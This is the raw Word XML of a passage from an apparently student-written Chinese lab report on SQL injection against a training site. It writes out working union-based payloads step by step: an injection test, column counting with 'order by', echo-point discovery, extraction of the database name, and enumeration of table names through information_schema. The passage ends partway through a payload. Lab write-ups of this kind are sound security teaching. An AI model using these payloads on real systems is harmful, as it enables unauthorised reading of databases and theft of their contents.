          <w:trHeight w:val="1301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636D65F5" w14:textId="77777777" w:rsidR="00C275C1" w:rsidRDefault="00125B21" w:rsidP="005208D0">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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8F38C4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>三、实验</w:t>
            </w:r>
            <w:r w:rsidR="00C47A2E" w:rsidRPr="008F38C4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>设计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA865DC" w14:textId="61A93756" w:rsidR="000A1CA7" w:rsidRPr="00611380" w:rsidRDefault="004D0B4C" w:rsidP="004D0B4C">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs>
              <w:ind w:firstLineChars="200" w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D0B4C">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>任何SQL是操作数据库数据的结构化查询语言，网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数，修改拼接成SQL语句，传递给Web服务器，进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库，就可能导致拼接的SQL被执行，获取对数据库的信息以及提权，发生SQL注入攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B0DA1" w:rsidRPr="00504110" w14:paraId="52CE7B8A" w14:textId="77777777" w:rsidTr="00A5242F">
        <w:trPr>
          <w:trHeight w:val="1301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233546CA" w14:textId="17CC9D0C" w:rsidR="001B0DA1" w:rsidRDefault="001B0DA1" w:rsidP="001B0DA1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四、实验过程或算法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3253FF88" w14:textId="0DA69AF6" w:rsidR="00DA4B05" w:rsidRPr="001D4C93" w:rsidRDefault="00D77F4C" w:rsidP="007A5E56">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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D4C93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1.</w:t>
            </w:r>
            <w:r w:rsidR="00D0594B" w:rsidRPr="001D4C93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判断</w:t>
            </w:r>
            <w:r w:rsidR="001D4C93" w:rsidRPr="001D4C93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注入点</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B7F3D23" w14:textId="5DEFD965" w:rsidR="00D77F4C" w:rsidRDefault="00D77F4C" w:rsidP="00D77F4C">
            <w:pPr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进入</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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http://pu2lh35s.ia.aqlab.cn/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网站，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点击“</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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点击查看新闻</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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”，发现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url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变为</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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http://pu2lh35s.ia.aqlab.cn/</w:t>
            </w:r>
            <w:r w:rsidR="0007111F" w:rsidRPr="0007111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index.php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?id=1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由于输入的参数</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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为整形，猜测为数字型注入，且</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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语句为：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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select * from table where id=1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4DB1CD25" w14:textId="556D24DE" w:rsidR="00D0594B" w:rsidRDefault="00D0594B" w:rsidP="006E3242">
            <w:pPr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7111F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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572C3E2D" wp14:editId="6C98B355">
                  <wp:extent cx="3600000" cy="2695659"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="79076869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76869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695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AF7BE" w14:textId="41EEA09E" w:rsidR="008C0A8D" w:rsidRDefault="00D77F4C" w:rsidP="00DA0CD5">
            <w:pPr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测试</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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http://pu2lh35s.ia.aqlab.cn/?id=1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Pr="00D77F4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SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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语句为：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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select * from table where id=1</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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’，页面出现异常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25C28347" w14:textId="20B67854" w:rsidR="00D0594B" w:rsidRDefault="00D0594B" w:rsidP="006E3242">
            <w:pPr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D0594B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs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1332FCF8" wp14:editId="540A3AAB">
                  <wp:extent cx="3600000" cy="2156903"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="204377959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77959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156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6B016" w14:textId="310B0DFD" w:rsidR="008C0A8D" w:rsidRDefault="00D77F4C" w:rsidP="00DA0CD5">
            <w:pPr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测试</w:t>
            </w:r>
            <w:r w:rsidR="00DA0CD5" w:rsidRPr="00D77F4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http://pu2lh35s.ia.aqlab.cn/?id=1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and 1=1</w:t>
            </w:r>
            <w:r w:rsidR="00D0594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Pr="00D77F4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SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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语句为：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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select * from table where id=1 and 1=1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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页面正常</w:t>
            </w:r>
            <w:r w:rsidR="00DA0CD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498DB1A8" w14:textId="51BC2BAA" w:rsidR="00D0594B" w:rsidRDefault="00D0594B" w:rsidP="006E3242">
            <w:pPr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D0594B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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3AE3EF87" wp14:editId="44B2B430">
                  <wp:extent cx="3600000" cy="2395307"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="107213600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13600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395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35E1C" w14:textId="4D243F9B" w:rsidR="00D77F4C" w:rsidRDefault="00DA0CD5" w:rsidP="00DA0CD5">
            <w:pPr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测试</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77F4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http://pu2lh35s.ia.aqlab.cn/?id=1</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA0CD5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and 1=2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Pr="00DA0CD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SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA0CD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语句为：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA0CD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select * from table where id=1</w:t>
            </w:r>
            <w:bookmarkStart w:id="36" w:name="OLE_LINK14"/>
            <w:r w:rsidRPr="00DA0CD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and 1=2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="36"/>
            <w:r w:rsidRPr="00DA0CD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返回数据与原始请求不同</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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2B0AA847" w14:textId="3CF61FC7" w:rsidR="00D0594B" w:rsidRDefault="00D0594B" w:rsidP="006E3242">
            <w:pPr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D0594B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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492DF606" wp14:editId="18CCD8FB">
                  <wp:extent cx="3600000" cy="2148924"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="16716935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69352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14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251BE" w14:textId="62B117F6" w:rsidR="00BF3E40" w:rsidRDefault="00BF3E40" w:rsidP="00BF3E40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说明</w:t>
            </w:r>
            <w:r w:rsidR="00D92BD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该网站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存在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SQL</w:t>
            </w:r>
            <w:r w:rsidR="00D0594B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数字型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注入漏洞。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72F7D4A1" w14:textId="760CEB54" w:rsidR="00D77F4C" w:rsidRPr="00DA4B05" w:rsidRDefault="00D77F4C" w:rsidP="007A5E56">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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2CEDDB8D" w14:textId="102A28FB" w:rsidR="003749BA" w:rsidRPr="001D4C93" w:rsidRDefault="00BF3E40" w:rsidP="003749BA">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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D4C93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lastRenderedPageBreak/>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidRPr="001D4C93">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001D4C93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判断</w:t>
            </w:r>
            <w:r w:rsidRPr="001D4C93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字段</w:t>
            </w:r>
            <w:r w:rsidR="001D4C93" w:rsidRPr="001D4C93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数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42BFCB83" w14:textId="531E571A" w:rsidR="00317841" w:rsidRDefault="001D4C93" w:rsidP="00317841">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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31784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order by</w:t>
            </w:r>
            <w:r w:rsidRPr="001D4C9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语句用于根据指定的列对结果集进行排序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字段数</w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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order by n </w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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来判断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4CB1CD7B" w14:textId="2762BED8" w:rsidR="00BF3E40" w:rsidRDefault="00317841" w:rsidP="00BF3E40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bookmarkStart w:id="37" w:name="OLE_LINK1"/>
            <w:bookmarkStart w:id="38" w:name="OLE_LINK12"/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测试</w:t>
            </w:r>
            <w:r w:rsidR="00BF3E40" w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1</w:t>
            </w:r>
            <w:bookmarkEnd w:id="37"/>
            <w:r w:rsidR="00BF3E4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order by </w:t>
            </w:r>
            <w:r w:rsidR="00D92BD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</w:t>
            </w:r>
            <w:r w:rsidR="00D92BD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和</w:t>
            </w:r>
            <w:bookmarkEnd w:id="38"/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测试</w:t>
            </w:r>
            <w:r w:rsidR="00BF3E40" w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1</w:t>
            </w:r>
            <w:r w:rsidR="00BF3E4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order by 2</w:t>
            </w:r>
            <w:r w:rsidR="00D92BD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页面均显示正常。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FCCD698" w14:textId="029C5EF0" w:rsidR="00317841" w:rsidRDefault="00317841" w:rsidP="006E3242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317841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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43F2CD97" wp14:editId="50E2A9D5">
                  <wp:extent cx="3600000" cy="2362925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="13353884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38843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36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24CAD0" w14:textId="3AC0941A" w:rsidR="00BF3E40" w:rsidRDefault="00317841" w:rsidP="00BF3E40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测试</w:t>
            </w:r>
            <w:r w:rsidR="00BF3E40" w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1</w:t>
            </w:r>
            <w:r w:rsidR="00BF3E4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order by 3</w:t>
            </w:r>
            <w:r w:rsidR="00D92BD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，页面显示错误。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D47BEE7" w14:textId="5948E713" w:rsidR="00317841" w:rsidRDefault="00317841" w:rsidP="006E3242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317841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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CD59A4B" wp14:editId="111003F9">
                  <wp:extent cx="3600000" cy="2123112"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="21472642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26423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123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B988A" w14:textId="0B3828F3" w:rsidR="00BF3E40" w:rsidRDefault="00BF3E40" w:rsidP="00D0594B">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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BF3E4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当</w:t>
            </w:r>
            <w:bookmarkStart w:id="39" w:name="OLE_LINK13"/>
            <w:r w:rsidRPr="00BF3E4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id=1 order by </w:t>
            </w:r>
            <w:r w:rsidR="0031784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</w:t>
            </w:r>
            <w:bookmarkEnd w:id="39"/>
            <w:r w:rsidR="0031784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和</w:t>
            </w:r>
            <w:r w:rsidR="00317841" w:rsidRPr="00BF3E4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id=1 order by </w:t>
            </w:r>
            <w:r w:rsidR="0031784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</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3E4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时，页面返回与</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3E4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id=1</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3E4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相同的结果；而</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3E4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id=1 order by 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3</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3E4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时不一样，故</w:t>
            </w:r>
            <w:r w:rsidR="001D4C9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此处存在</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3E4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字段数量</w:t>
            </w:r>
            <w:r w:rsidR="001D4C9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为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</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3E4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466E6E1D" w14:textId="77777777" w:rsidR="002D613A" w:rsidRPr="00BF3E40" w:rsidRDefault="002D613A" w:rsidP="00D0594B">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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7F5E85CA" w14:textId="281CE20B" w:rsidR="003749BA" w:rsidRPr="001D4C93" w:rsidRDefault="00E85AAE" w:rsidP="003749BA">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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D4C93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3.</w:t>
            </w:r>
            <w:r w:rsidR="001D4C93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判断回显点</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="281A76EA" w14:textId="5A623A4A" w:rsidR="00D92BD0" w:rsidRDefault="00317841" w:rsidP="003F52DE">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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31784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使用</w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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union select</w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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联合查询继续获取信息。</w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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union </w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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运算符可以将两个或两个以上</w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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select </w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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语句的查询结果集合合并成一个结果集合显示，即执行联合查询。需要注意在使用</w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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union </w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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查询的时候需要和主查询的列数相同，而我们之前已经知道了主查询列数为</w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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2</w:t>
            </w:r>
            <w:r w:rsidRPr="0031784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接下来需要判断回显位置。</w:t>
            </w:r>
            <w:r w:rsidR="00D92BD0" w:rsidRPr="00D92BD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通过</w:t>
            </w:r>
            <w:r w:rsidR="001D4C9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在</w:t>
            </w:r>
            <w:r w:rsidR="001D4C93" w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>id=1</w:t>
            </w:r>
            <w:r w:rsidR="001D4C9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之后添加</w:t>
            </w:r>
            <w:r w:rsidR="001D4C93"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and</w:t>
            </w:r>
            <w:r w:rsidR="001D4C9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1D4C93"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=2</w:t>
            </w:r>
            <w:r w:rsidR="001D4C9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即</w:t>
            </w:r>
            <w:r w:rsidR="00D92BD0" w:rsidRPr="00D92BD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可以屏蔽掉</w:t>
            </w:r>
            <w:r w:rsidR="001D4C9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对</w:t>
            </w:r>
            <w:r w:rsidR="00D92BD0" w:rsidRPr="00D92BD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原数据库的查询</w:t>
            </w:r>
            <w:r w:rsidR="003F52D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79431333" w14:textId="107710DE" w:rsidR="00E85AAE" w:rsidRDefault="00317841" w:rsidP="00E85AAE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bookmarkStart w:id="40" w:name="OLE_LINK11"/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测试</w:t>
            </w:r>
            <w:r w:rsidR="00E85AAE" w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1</w:t>
            </w:r>
            <w:r w:rsidR="00E85AAE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="00E85AAE"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and</w:t>
            </w:r>
            <w:r w:rsidR="00E85AA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E85AAE"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=2</w:t>
            </w:r>
            <w:r w:rsidR="00E85AA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E85AAE"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union</w:t>
            </w:r>
            <w:r w:rsidR="00E85AA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E85AAE"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select</w:t>
            </w:r>
            <w:r w:rsidR="00E85AA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E85AAE"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,2</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="40"/>
          <w:p w14:paraId="31B9585D" w14:textId="37A27F19" w:rsidR="00E85AAE" w:rsidRDefault="00317841" w:rsidP="006E3242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9830EC" wp14:editId="44F2FFB5">
                  <wp:extent cx="3600000" cy="2317406"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1857896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31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7956FB" w14:textId="148C3CC3" w:rsidR="00317841" w:rsidRDefault="001D4C93" w:rsidP="001D4C93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1D4C9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由此可以得到，</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE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回显点为</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE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2</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE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，</w:t>
            </w:r>
            <w:r w:rsidRPr="001D4C9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回显位置就在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红框</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE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处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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A47847" w14:textId="77777777" w:rsidR="003F52DE" w:rsidRDefault="003F52DE" w:rsidP="001D4C93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  <w:p w14:paraId="76E0EA44" w14:textId="6C7490E7" w:rsidR="003F52DE" w:rsidRPr="003F52DE" w:rsidRDefault="003F52DE" w:rsidP="003F52DE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pPr>
            <w:r w:rsidRPr="003F52DE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8"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidRPr="003F52DE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8"/>
              </w:rPr>
              <w:t>查询相关内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DC71324" w14:textId="4EE7EBCC" w:rsidR="00AB181D" w:rsidRDefault="00AB181D" w:rsidP="00AB181D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pPr>
            <w:r w:rsidRPr="003F52DE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8"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="003F52DE" w:rsidRPr="003F52DE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8"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="003F52DE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8"/>
              </w:rPr>
              <w:t>数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5609C80E" w14:textId="77777777" w:rsidR="003F52DE" w:rsidRDefault="003F52DE" w:rsidP="003F52DE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3F52DE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使用</w:t>
            </w:r>
            <w:r w:rsidRPr="003F52DE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database()</w:t>
            </w:r>
            <w:r w:rsidRPr="003F52DE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函数返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回</w:t>
            </w:r>
            <w:r w:rsidRPr="003F52DE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当前数据库的名称，在刚刚的回显点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处</w:t>
            </w:r>
            <w:r w:rsidRPr="003F52DE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加入</w:t>
            </w:r>
            <w:r w:rsidRPr="003F52DE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database()</w:t>
            </w:r>
            <w:r w:rsidRPr="003F52DE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函数，得到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数据库名称。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="733A2B11" w14:textId="327DB2BC" w:rsidR="00E85AAE" w:rsidRPr="00E85AAE" w:rsidRDefault="003F52DE" w:rsidP="006E3242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测试</w:t>
            </w:r>
            <w:r w:rsidR="00E85AAE" w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1</w:t>
            </w:r>
            <w:r w:rsidR="00E85AAE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="00E85AAE"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and</w:t>
            </w:r>
            <w:r w:rsidR="00E85AA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E85AAE"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=2</w:t>
            </w:r>
            <w:r w:rsidR="00E85AA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E85AAE"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union</w:t>
            </w:r>
            <w:r w:rsidR="00E85AA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E85AAE"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select</w:t>
            </w:r>
            <w:r w:rsidR="00E85AA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E85AAE"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,database()</w:t>
            </w:r>
            <w:r w:rsidR="006E324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="006E3242" w:rsidRPr="003F52DE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获得数据库名称</w:t>
            </w:r>
            <w:r w:rsidR="006E324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: maoshe</w:t>
            </w:r>
            <w:r w:rsidR="006E324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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65DF5FF5" w14:textId="74E01239" w:rsidR="00E85AAE" w:rsidRDefault="00317841" w:rsidP="006E3242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A7857E" wp14:editId="7A55B44E">
                  <wp:extent cx="3600000" cy="2343685"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="28138579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34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AC81BB" w14:textId="1B3EA499" w:rsidR="003F52DE" w:rsidRDefault="003F52DE" w:rsidP="006E3242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  <w:p w14:paraId="4749929F" w14:textId="77777777" w:rsidR="003F52DE" w:rsidRDefault="003F52DE" w:rsidP="003F52DE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  <w:p w14:paraId="64567FAA" w14:textId="7C0D6326" w:rsidR="00AB181D" w:rsidRPr="003F52DE" w:rsidRDefault="003F52DE" w:rsidP="00AB181D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pPr>
            <w:r w:rsidRPr="003F52DE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8"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4.2</w:t>
            </w:r>
            <w:r w:rsidR="00AB181D" w:rsidRPr="003F52DE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8"/>
              </w:rPr>
              <w:t>数据库中的所有表的名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CE883C2" w14:textId="1FC0C5DE" w:rsidR="00AB181D" w:rsidRDefault="00BC23FC" w:rsidP="00BC23FC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使用</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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SQL</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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语句：</w:t>
            </w:r>
            <w:r w:rsidR="00AB181D" w:rsidRPr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>select table_name from information_schema.tables where table_schema</w:t>
            </w:r>
            <w:r w:rsidR="00AB181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="00AB181D" w:rsidRPr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidR="00AB181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="00AB181D" w:rsidRPr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidR="00AB181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maoshe</w:t>
            </w:r>
            <w:r w:rsidR="00AB181D" w:rsidRPr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>'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获取数据库中的表名。并</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC23F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使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC23F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limit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修改第一个数字进行</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC23F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挨个遍历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查询，比如查询第一个表名</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC23FC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limit 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</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC23FC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>,1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，查询第二个表名</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC23FC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>limit 1,1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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25869D74" w14:textId="06E9F91C" w:rsidR="00AB181D" w:rsidRDefault="00BC23FC" w:rsidP="00EF1454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测试</w:t>
            </w:r>
            <w:r w:rsidR="00AB181D" w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1</w:t>
            </w:r>
            <w:r w:rsidR="00AB181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="00AB181D"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and</w:t>
            </w:r>
            <w:r w:rsidR="00AB181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AB181D"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=2</w:t>
            </w:r>
            <w:r w:rsidR="00AB181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AB181D"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union</w:t>
            </w:r>
            <w:r w:rsidR="00AB181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AB181D"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select</w:t>
            </w:r>
            <w:r w:rsidR="00AB181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AB181D"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,</w:t>
            </w:r>
            <w:r w:rsidR="00AB181D" w:rsidRPr="00AB181D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table_name from information_schema.tables where table_schema</w:t>
            </w:r>
            <w:r w:rsidR="00AB181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="00AB181D" w:rsidRPr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidR="00AB181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="00AB181D" w:rsidRPr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidR="00AB181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maoshe</w:t>
            </w:r>
            <w:r w:rsidR="00AB181D" w:rsidRPr="00AB181D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' limit </w:t>
            </w:r>
            <w:r w:rsidR="00AB181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</w:t>
            </w:r>
            <w:r w:rsidR="00AB181D" w:rsidRPr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>,1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，获得</w:t>
            </w:r>
            <w:r w:rsidR="00EF1454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第</w:t>
            </w:r>
            <w:r w:rsidR="00EF1454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</w:t>
            </w:r>
            <w:r w:rsidR="00EF1454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个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表名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admin</w:t>
            </w:r>
            <w:r w:rsidR="00EF1454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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DBD22A8" w14:textId="77777777" w:rsidR="00EF1454" w:rsidRDefault="00BC23FC" w:rsidP="006E3242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F44802" wp14:editId="53B59830">
                  <wp:extent cx="3600000" cy="2311302"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="151854894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311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A4638" w14:textId="177DA82B" w:rsidR="00EF1454" w:rsidRPr="00EF1454" w:rsidRDefault="00EF1454" w:rsidP="00EF1454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测试</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1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and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=2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union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select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,</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB181D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table_name from information_schema.tables where table_schema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Pr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>=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Pr="00AB181D">
              <w:rPr>
